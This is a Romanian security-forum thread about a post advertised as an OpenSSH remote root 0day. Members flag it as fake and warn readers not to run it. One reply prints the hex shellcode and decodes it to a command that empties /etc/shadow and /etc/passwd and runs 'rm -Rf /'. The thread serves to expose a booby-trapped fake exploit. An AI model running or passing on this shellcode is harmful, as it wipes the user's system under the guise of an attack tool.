OpenSSH <= 5.3 remote root 0day exploit (32-bit x86) Priv8! Priv8! Priv8!

craigcraig · March 24, 2013

/*

*

* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!

*

* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)

* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!

*

*/

#include <stdio.h>

#include <netdb.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <arpa/inet.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

// FAKE

Edited March 24, 2013 by Nytro

romanu · March 24, 2013

e teapa, uita-te ce contine stringu ala:

http://www.noktec.be/archives/894

Edited March 24, 2013 by romanu

romanu · March 24, 2013

Nu-l rulati!

craigcraig · March 24, 2013

lol sa mor de m-am uitat in el mai bine scuze.

wildchild · March 24, 2013

$perl -e 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74
\x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1\xcd\x80"' > exploit

Rezultat:

Rfh-c

h/sh

h/bin

echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf /

Frumoas? încercare. ?terge-o!

Ceilal?i: Ca s? nu da?i de un self-pwn shellcode, rula?i-l m?car pe o ma?in? virtual? cu deepfreeze pe ea.

Sign In

OpenSSH <= 5.3 remote root 0day exploit (32-bit x86) Priv8! Priv8! Priv8!

Recommended Posts

craigcraig

romanu

romanu

craigcraig

wildchild

Join the conversation

Browse

Activity

Pages